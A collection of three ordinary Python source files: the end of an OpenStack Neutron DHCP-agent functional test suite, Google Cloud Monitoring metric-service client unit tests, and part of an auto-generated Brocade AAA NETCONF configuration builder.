if prefix_override is not None:
cidr = '/'.join((cidr.split('/')[0], str(prefix_override)))
sn_dict = dhcp.DictModel({
"id": uuidutils.generate_uuid(),
"network_id": net_id,
"ip_version": ip_version,
"cidr": cidr,
"gateway_ip": (self.
_IP_ADDRS[ip_version]['gateway']),
"enable_dhcp": dhcp_enabled,
"dns_nameservers": [],
"host_routes": [],
"ipv6_ra_mode": None,
"ipv6_address_mode": None})
if ip_version == 6:
sn_dict['ipv6_address_mode'] = lib_const.DHCPV6_STATEFUL
return sn_dict
def create_port_dict(self, network_id, subnet_id, mac_address,
ip_version=4, ip_address=None):
ip_address = (self._IP_ADDRS[ip_version]['addr']
if not ip_address else ip_address)
port_dict = dhcp.DictModel({
"id": uuidutils.generate_uuid(),
"name": "foo",
"mac_address": mac_address,
"network_id": network_id,
"admin_state_up": True,
"device_id": uuidutils.generate_uuid(),
"device_owner": "foo",
"fixed_ips": [{"subnet_id": subnet_id,
"ip_address": ip_address}], })
return port_dict
def create_network_dict(self, net_id, subnets=None, ports=None,
non_local_subnets=None):
subnets = [] if not subnets else subnets
ports = [] if not ports else ports
non_local_subnets = [] if not non_local_subnets else non_local_subnets
net_dict = dhcp.NetModel(d={
"id": net_id,
"subnets": subnets,
"non_local_subnets": non_local_subnets,
"ports": ports,
"admin_state_up": True,
"tenant_id": uuidutils.generate_uuid(), })
return net_dict
def get_interface_name(self, network, port):
device_manager = dhcp.DeviceManager(conf=self.conf, plugin=mock.Mock())
return device_manager.get_interface_name(network, port)
def configure_dhcp_for_network(self, network, dhcp_enabled=True):
self.agent.configure_dhcp_for_network(network)
self.addCleanup(self._cleanup_network, network, dhcp_enabled)
def _cleanup_network(self, network, dhcp_enabled):
self.mock_plugin_api.release_dhcp_port.return_value = None
if dhcp_enabled:
self.agent.call_driver('disable', network)
def assert_dhcp_resources(self, network, dhcp_enabled):
ovs = ovs_lib.BaseOVS()
port = network.ports[0]
iface_name = self.get_interface_name(network, port)
self.assertEqual(dhcp_enabled, ovs.port_exists(iface_name))
self.assert_dhcp_namespace(network.namespace, dhcp_enabled)
self.assert_accept_ra_disabled(network.namespace)
self.assert_dhcp_device(network.namespace, iface_name, dhcp_enabled)
def assert_dhcp_namespace(self, namespace, dhcp_enabled):
self.assertEqual(dhcp_enabled,
ip_lib.network_namespace_exists(namespace))
def assert_accept_ra_disabled(self, namespace):
actual = ip_lib.IPWrapper(namespace=namespace).netns.execute(
['sysctl', '-b', 'net.ipv6.conf.default.accept_ra'])
self.assertEqual('0', actual)
def assert_dhcp_device(self, namespace, dhcp_iface_name, dhcp_enabled):
dev = ip_lib.IPDevice(dhcp_iface_name, namespace)
self.assertEqual(dhcp_enabled, ip_lib.device_exists(
dhcp_iface_name, namespace))
if dhcp_enabled:
self.assertEqual(self._DHCP_PORT_MAC_ADDRESS, dev.link.address)
def _plug_port_for_dhcp_request(self, network, port):
namespace = network.namespace
vif_name = self.get_interface_name(network.id, port)
self.ovs_driver.plug(network.id, port.id, vif_name, port.mac_address,
self.conf['ovs_integration_bridge'],
namespace=namespace)
def _ip_list_for_vif(self, vif_name, namespace):
ip_device = ip_lib.IPDevice(vif_name, namespace)
return ip_device.addr.list(ip_version=4)
def _get_network_port_for_allocation_test(self):
network = self.network_dict_for_dhcp()
ip_addr = netaddr.IPNetwork(network.subnets[0].cidr)[1]
port = self.create_port_dict(
network.id, network.subnets[0].id,
mac_address=str(self._TENANT_PORT_MAC_ADDRESS),
ip_address=str(ip_addr))
return network, port
def assert_good_allocation_for_port(self, network, port):
vif_name = self.get_interface_name(network.id, port)
self._run_dhclient(vif_name, network)
predicate = lambda: len(
self._ip_list_for_vif(vif_name, network.namespace))
common_utils.wait_until_true(predicate, 10)
ip_list = self._ip_list_for_vif(vif_name, network.namespace)
cidr = ip_list[0].get('cidr')
ip_addr = str(netaddr.IPNetwork(cidr).ip)
self.assertEqual(port.fixed_ips[0].ip_address, ip_addr)
def assert_bad_allocation_for_port(self, network, port):
vif_name = self.get_interface_name(network.id, port)
self._run_dhclient(vif_name, network)
        # we need to wait some time (10 seconds is enough) and check
        # that dhclient has not configured an ip address for the interface
eventlet.sleep(10)
ip_list = self._ip_list_for_vif(vif_name, network.namespace)
self.assertEqual([], ip_list)
def _run_dhclient(self, vif_name, network):
        # NOTE: Before running dhclient we should create a resolv.conf file
        # in the namespace where we will run dhclient to test address
        # allocation for the port; otherwise, dhclient will override the
        # system /etc/resolv.conf.
        # By default, the folder for the dhcp-agent's namespace doesn't exist,
        # which is why we use AdminDirFixture to create a directory
        # with admin permissions in /etc/netns/ and touch resolv.conf in it.
etc_dir = '/etc/netns/%s' % network.namespace
self.useFixture(helpers.AdminDirFixture(etc_dir))
cmd = ['touch', os.path.join(etc_dir, 'resolv.conf')]
utils.execute(cmd, run_as_root=True)
dhclient_cmd = ['dhclient', '--no-pid', '-d', '-1', vif_name]
proc = net_helpers.RootHelperProcess(
cmd=dhclient_cmd, namespace=network.namespace)
self.addCleanup(proc.wait)
self.addCleanup(proc.kill)
def _get_metadata_proxy_process(self, network):
return external_process.ProcessManager(
self.conf,
network.id,
network.namespace)
class DHCPAgentOVSTestCase(DHCPAgentOVSTestFramework):
def test_create_subnet_with_dhcp(self):
dhcp_enabled = True
for version in [4, 6]:
network = self.network_dict_for_dhcp(
dhcp_enabled, ip_version=version)
self.configure_dhcp_for_network(network=network,
dhcp_enabled=dhcp_enabled)
self.assert_dhcp_resources(network, dhcp_enabled)
def test_create_subnet_with_non64_ipv6_cidrs(self):
# the agent should not throw exceptions on weird prefixes
dhcp_enabled = True
version = 6
for i in (0, 1, 41, 81, 121, 127, 128):
network = self.network_dict_for_dhcp(
dhcp_enabled, ip_version=version, prefix_override=i)
self.configure_dhcp_for_network(network=network,
dhcp_enabled=dhcp_enabled)
self.assertFalse(self.agent.needs_resync_reasons[network.id],
msg="prefix size of %s triggered resync" % i)
def test_agent_mtu_set_on_interface_driver(self):
network = self.network_dict_for_dhcp()
network["mtu"] = 789
self.configure_dhcp_for_network(network=network)
port = network.ports[0]
iface_name = self.get_interface_name(network, port)
dev = ip_lib.IPDevice(iface_name, network.namespace)
self.assertEqual(789, dev.link.mtu)
def test_good_address_allocation(self):
network, port = self._get_network_port_for_allocation_test()
network.ports.append(port)
self.configure_dhcp_for_network(network=network)
self._plug_port_for_dhcp_request(network, port)
self.assert_good_allocation_for_port(network, port)
def test_bad_address_allocation(self):
network, port = self._get_network_port_for_allocation_test()
network.ports.append(port)
self.configure_dhcp_for_network(network=network)
bad_mac_address = netaddr.EUI(self._TENANT_PORT_MAC_ADDRESS.value + 1)
bad_mac_address.dialect = netaddr.mac_unix
port.mac_address = str(bad_mac_address)
self._plug_port_for_dhcp_request(network, port)
self.assert_bad_allocation_for_port(network, port)
def _spawn_network_metadata_proxy(self):
network = self.network_dict_for_dhcp()
self.conf.set_override('enable_isolated_metadata', True)
self.addCleanup(self.agent.disable_isolated_metadata_proxy, network)
self.configure_dhcp_for_network(network=network)
pm = self._get_metadata_proxy_process(network)
common_utils.wait_until_true(
lambda: pm.active,
timeout=5,
sleep=0.01,
exception=RuntimeError("Metadata proxy didn't spawn"))
return (pm, network)
def test_metadata_proxy_respawned(self):
pm, network = self._spawn_network_metadata_proxy()
old_pid = pm.pid
utils.execute(['kill', '-9', old_pid], run_as_root=True)
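        # the agent's external-process monitor (check_child_processes_interval
        # is set to 1 second in setUp) should notice the dead proxy and
        # respawn it under a new pid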
common_utils.wait_until_true(
lambda: pm.active and pm.pid != old_pid,
timeout=5,
sleep=0.1,
exception=RuntimeError("Metadata proxy didn't respawn"))
def test_stale_metadata_proxy_killed(self):
pm, network = self._spawn_network_metadata_proxy()
self.conf.set_override('enable_isolated_metadata', False)
self.configure_dhcp_for_network(network=network)
common_utils.wait_until_true(
lambda: not pm.active,
timeout=5,
sleep=0.1,
exception=RuntimeError("Stale metadata proxy didn't get killed"))
def _test_metadata_proxy_spawn_kill_with_subnet_create_delete(self):
network = self.network_dict_for_dhcp(ip_version=6)
self.configure_dhcp_for_network(network=network)
pm = self._get_metadata_proxy_process(network)
        # A newly created network with an ipv6 subnet will not have a metadata proxy
self.assertFalse(pm.active)
new_network = copy.deepcopy(network)
dhcp_enabled_ipv4_subnet = self.create_subnet_dict(network.id)
new_network.subnets.append(dhcp_enabled_ipv4_subnet)
self.mock_plugin_api.get_network_info.return_value = new_network
self.agent.refresh_dhcp_helper(network.id)
# Metadata proxy should be spawned for the newly added subnet
common_utils.wait_until_true(
lambda: pm.active,
timeout=5,
sleep=0.1,
exception=RuntimeError("Metadata proxy didn't spawn"))
self.mock_plugin_api.get_network_info.return_value = network
self.agent.refresh_dhcp_helper(network.id)
# Metadata proxy should be killed because network doesn't need it.
common_utils.wait_until_true(
lambda: not pm.active,
timeout=5,
sleep=0.1,
exception=RuntimeError("Metadata proxy didn't get killed"))
def test_enable_isolated_metadata_for_subnet_create_delete(self):
self.conf.set_override('force_metadata', False)
self.conf.set_override('enable_isolated_metadata', True)
self._test_metadata_proxy_spawn_kill_with_subnet_create_delete()
def test_force_metadata_for_subnet_create_delete(self):
self.conf.set_override('force_metadata', True)
self.conf.set_override('enable_isolated_metadata', False)
self._test_metadata_proxy_spawn_kill_with_subnet_create_delete()
def test_notify_port_ready_after_enable_dhcp(self):
network = self.network_dict_for_dhcp()
dhcp_port = self.create_port_dict(
network.id, network.subnets[0].id,
'24:77:03:7d:00:4d', ip_address='192.168.10.11')
dhcp_port.device_owner = lib_const.DEVICE_OWNER_DHCP
network.ports.append(dhcp_port)
self.agent.start_ready_ports_loop()
self.configure_dhcp_for_network(network)
ports_to_send = {p.id for p in network.ports}
common_utils.wait_until_true(
lambda: self.mock_plugin_api.dhcp_ready_on_ports.called,
timeout=1,
sleep=0.1,
            exception=RuntimeError("'dhcp_ready_on_ports' was not called"))
self.mock_plugin_api.dhcp_ready_on_ports.assert_called_with(
ports_to_send)
| huntxu/neutron | neutron/tests/functional/agent/test_dhcp_agent.py | Python | apache-2.0 | 17,256 |
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests."""
import mock
import pytest
from google.api import metric_pb2 as api_metric_pb2
from google.api import monitored_resource_pb2
from google.cloud import monitoring_v3
from google.cloud.monitoring_v3 import enums
from google.cloud.monitoring_v3.proto import common_pb2
from google.cloud.monitoring_v3.proto import metric_pb2 as proto_metric_pb2
from google.cloud.monitoring_v3.proto import metric_service_pb2
from google.protobuf import empty_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
    def __init__(self, responses=None):
        # avoid a shared mutable default: responses is popped from below, so
        # a default list would leak state across stub instances
        self.responses = responses if responses is not None else []
        self.requests = []
def unary_unary(self, method, request_serializer=None, response_deserializer=None):
return MultiCallableStub(method, self)
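# Stub pattern note (illustrative): each faked RPC records its
# (method, request) pair on the channel stub and pops the next canned
# response, so tests can assert on the exact request protos the client sends.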
class CustomException(Exception):
pass
class TestMetricServiceClient(object):
def test_list_monitored_resource_descriptors(self):
# Setup Expected Response
next_page_token = ""
resource_descriptors_element = {}
resource_descriptors = [resource_descriptors_element]
expected_response = {
"next_page_token": next_page_token,
"resource_descriptors": resource_descriptors,
}
expected_response = metric_service_pb2.ListMonitoredResourceDescriptorsResponse(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup Request
name = client.project_path("[PROJECT]")
paged_list_response = client.list_monitored_resource_descriptors(name)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.resource_descriptors[0] == resources[0]
assert len(channel.requests) == 1
expected_request = metric_service_pb2.ListMonitoredResourceDescriptorsRequest(
name=name
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_monitored_resource_descriptors_exception(self):
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup request
name = client.project_path("[PROJECT]")
paged_list_response = client.list_monitored_resource_descriptors(name)
with pytest.raises(CustomException):
list(paged_list_response)
def test_get_monitored_resource_descriptor(self):
# Setup Expected Response
name_2 = "name2-1052831874"
type_ = "type3575610"
display_name = "displayName1615086568"
description = "description-1724546052"
expected_response = {
"name": name_2,
"type": type_,
"display_name": display_name,
"description": description,
}
expected_response = monitored_resource_pb2.MonitoredResourceDescriptor(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup Request
name = client.monitored_resource_descriptor_path(
"[PROJECT]", "[MONITORED_RESOURCE_DESCRIPTOR]"
)
response = client.get_monitored_resource_descriptor(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = metric_service_pb2.GetMonitoredResourceDescriptorRequest(
name=name
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_monitored_resource_descriptor_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup request
name = client.monitored_resource_descriptor_path(
"[PROJECT]", "[MONITORED_RESOURCE_DESCRIPTOR]"
)
with pytest.raises(CustomException):
client.get_monitored_resource_descriptor(name)
def test_list_metric_descriptors(self):
# Setup Expected Response
next_page_token = ""
metric_descriptors_element = {}
metric_descriptors = [metric_descriptors_element]
expected_response = {
"next_page_token": next_page_token,
"metric_descriptors": metric_descriptors,
}
expected_response = metric_service_pb2.ListMetricDescriptorsResponse(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup Request
name = client.project_path("[PROJECT]")
paged_list_response = client.list_metric_descriptors(name)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.metric_descriptors[0] == resources[0]
assert len(channel.requests) == 1
expected_request = metric_service_pb2.ListMetricDescriptorsRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_metric_descriptors_exception(self):
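        # Mock the API response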
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup request
name = client.project_path("[PROJECT]")
paged_list_response = client.list_metric_descriptors(name)
with pytest.raises(CustomException):
list(paged_list_response)
def test_get_metric_descriptor(self):
# Setup Expected Response
name_2 = "name2-1052831874"
type_ = "type3575610"
unit = "unit3594628"
description = "description-1724546052"
display_name = "displayName1615086568"
expected_response = {
"name": name_2,
"type": type_,
"unit": unit,
"description": description,
"display_name": display_name,
}
expected_response = api_metric_pb2.MetricDescriptor(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup Request
name = client.metric_descriptor_path("[PROJECT]", "[METRIC_DESCRIPTOR]")
response = client.get_metric_descriptor(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = metric_service_pb2.GetMetricDescriptorRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_metric_descriptor_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup request
name = client.metric_descriptor_path("[PROJECT]", "[METRIC_DESCRIPTOR]")
with pytest.raises(CustomException):
client.get_metric_descriptor(name)
def test_create_metric_descriptor(self):
# Setup Expected Response
name_2 = "name2-1052831874"
type_ = "type3575610"
unit = "unit3594628"
description = "description-1724546052"
display_name = "displayName1615086568"
expected_response = {
"name": name_2,
"type": type_,
"unit": unit,
"description": description,
"display_name": display_name,
}
expected_response = api_metric_pb2.MetricDescriptor(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup Request
name = client.project_path("[PROJECT]")
metric_descriptor = {}
response = client.create_metric_descriptor(name, metric_descriptor)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = metric_service_pb2.CreateMetricDescriptorRequest(
name=name, metric_descriptor=metric_descriptor
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_metric_descriptor_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup request
name = client.project_path("[PROJECT]")
metric_descriptor = {}
with pytest.raises(CustomException):
client.create_metric_descriptor(name, metric_descriptor)
def test_delete_metric_descriptor(self):
channel = ChannelStub()
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup Request
name = client.metric_descriptor_path("[PROJECT]", "[METRIC_DESCRIPTOR]")
client.delete_metric_descriptor(name)
assert len(channel.requests) == 1
expected_request = metric_service_pb2.DeleteMetricDescriptorRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_metric_descriptor_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup request
name = client.metric_descriptor_path("[PROJECT]", "[METRIC_DESCRIPTOR]")
with pytest.raises(CustomException):
client.delete_metric_descriptor(name)
def test_list_time_series(self):
# Setup Expected Response
next_page_token = ""
time_series_element = {}
time_series = [time_series_element]
expected_response = {
"next_page_token": next_page_token,
"time_series": time_series,
}
expected_response = metric_service_pb2.ListTimeSeriesResponse(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup Request
name = client.project_path("[PROJECT]")
filter_ = "filter-1274492040"
interval = {}
view = enums.ListTimeSeriesRequest.TimeSeriesView.FULL
paged_list_response = client.list_time_series(name, filter_, interval, view)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.time_series[0] == resources[0]
assert len(channel.requests) == 1
expected_request = metric_service_pb2.ListTimeSeriesRequest(
name=name, filter=filter_, interval=interval, view=view
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_time_series_exception(self):
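        # Mock the API response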
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup request
name = client.project_path("[PROJECT]")
filter_ = "filter-1274492040"
interval = {}
view = enums.ListTimeSeriesRequest.TimeSeriesView.FULL
paged_list_response = client.list_time_series(name, filter_, interval, view)
with pytest.raises(CustomException):
list(paged_list_response)
def test_create_time_series(self):
channel = ChannelStub()
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup Request
name = client.project_path("[PROJECT]")
time_series = []
client.create_time_series(name, time_series)
assert len(channel.requests) == 1
expected_request = metric_service_pb2.CreateTimeSeriesRequest(
name=name, time_series=time_series
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_time_series_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = monitoring_v3.MetricServiceClient()
# Setup request
name = client.project_path("[PROJECT]")
time_series = []
with pytest.raises(CustomException):
client.create_time_series(name, time_series)
| tseaver/google-cloud-python | monitoring/tests/unit/gapic/v3/test_metric_service_client_v3.py | Python | apache-2.0 | 16,399 |
#!/usr/bin/env python
import xml.etree.ElementTree as ET
class brocade_aaa(object):
    """Auto generated class: builds NETCONF <config> payloads for the
    urn:brocade.com:mgmt:brocade-aaa YANG module and hands each element
    to the transport callback supplied at construction.
    """
    def __init__(self, **kwargs):
        """Store the transport callback used to deliver each generated
        <config> element (e.g. a NETCONF edit-config sender).
        """
        self._callback = kwargs.pop('callback')
def aaa_config_aaa_authentication_login_first(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
aaa_config = ET.SubElement(config, "aaa-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
aaa = ET.SubElement(aaa_config, "aaa")
authentication = ET.SubElement(aaa, "authentication")
login = ET.SubElement(authentication, "login")
first = ET.SubElement(login, "first")
first.text = kwargs.pop('first')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def aaa_config_aaa_authentication_login_second(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
aaa_config = ET.SubElement(config, "aaa-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
aaa = ET.SubElement(aaa_config, "aaa")
authentication = ET.SubElement(aaa, "authentication")
login = ET.SubElement(authentication, "login")
second = ET.SubElement(login, "second")
second.text = kwargs.pop('second')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def aaa_config_aaa_accounting_exec_defaultacc_start_stop_server_type(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
aaa_config = ET.SubElement(config, "aaa-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
aaa = ET.SubElement(aaa_config, "aaa")
accounting = ET.SubElement(aaa, "accounting")
exec_el = ET.SubElement(accounting, "exec")
defaultacc = ET.SubElement(exec_el, "defaultacc")
start_stop = ET.SubElement(defaultacc, "start-stop")
server_type = ET.SubElement(start_stop, "server-type")
server_type.text = kwargs.pop('server_type')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def aaa_config_aaa_accounting_commands_defaultacc_start_stop_server_type(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
aaa_config = ET.SubElement(config, "aaa-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
aaa = ET.SubElement(aaa_config, "aaa")
accounting = ET.SubElement(aaa, "accounting")
commands = ET.SubElement(accounting, "commands")
defaultacc = ET.SubElement(commands, "defaultacc")
start_stop = ET.SubElement(defaultacc, "start-stop")
server_type = ET.SubElement(start_stop, "server-type")
server_type.text = kwargs.pop('server_type')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name = ET.SubElement(username, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_user_password(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
user_password = ET.SubElement(username, "user-password")
user_password.text = kwargs.pop('user_password')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_encryption_level(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
encryption_level = ET.SubElement(username, "encryption-level")
encryption_level.text = kwargs.pop('encryption_level')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_role(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
role = ET.SubElement(username, "role")
role.text = kwargs.pop('role')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_desc(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
desc = ET.SubElement(username, "desc")
desc.text = kwargs.pop('desc')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_enable(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
enable = ET.SubElement(username, "enable")
enable.text = kwargs.pop('enable')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_expire(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
expire = ET.SubElement(username, "expire")
expire.text = kwargs.pop('expire')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def service_password_encryption(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
service = ET.SubElement(config, "service", xmlns="urn:brocade.com:mgmt:brocade-aaa")
password_encryption = ET.SubElement(service, "password-encryption")
callback = kwargs.pop('callback', self._callback)
return callback(config)
    def role_name_name(self, **kwargs):
        """Auto Generated Code
        """
        config = ET.Element("config")
        role = ET.SubElement(config, "role", xmlns="urn:brocade.com:mgmt:brocade-aaa")
        name_list = ET.SubElement(role, "name")
        name = ET.SubElement(name_list, "name")
        name.text = kwargs.pop('name')
        callback = kwargs.pop('callback', self._callback)
        return callback(config)
def role_name_desc(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
role = ET.SubElement(config, "role", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name = ET.SubElement(role, "name")
name_key = ET.SubElement(name, "name")
name_key.text = kwargs.pop('name')
desc = ET.SubElement(name, "desc")
desc.text = kwargs.pop('desc')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_hostname(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
hostname = ET.SubElement(host, "hostname")
hostname.text = kwargs.pop('hostname')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_use_vrf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf = ET.SubElement(host, "use-vrf")
use_vrf.text = kwargs.pop('use_vrf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_auth_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
auth_port = ET.SubElement(host, "auth-port")
auth_port.text = kwargs.pop('auth_port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_protocol(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
protocol = ET.SubElement(host, "protocol")
protocol.text = kwargs.pop('protocol')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_key(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
key = ET.SubElement(host, "key")
key.text = kwargs.pop('key')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_encryption_level(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
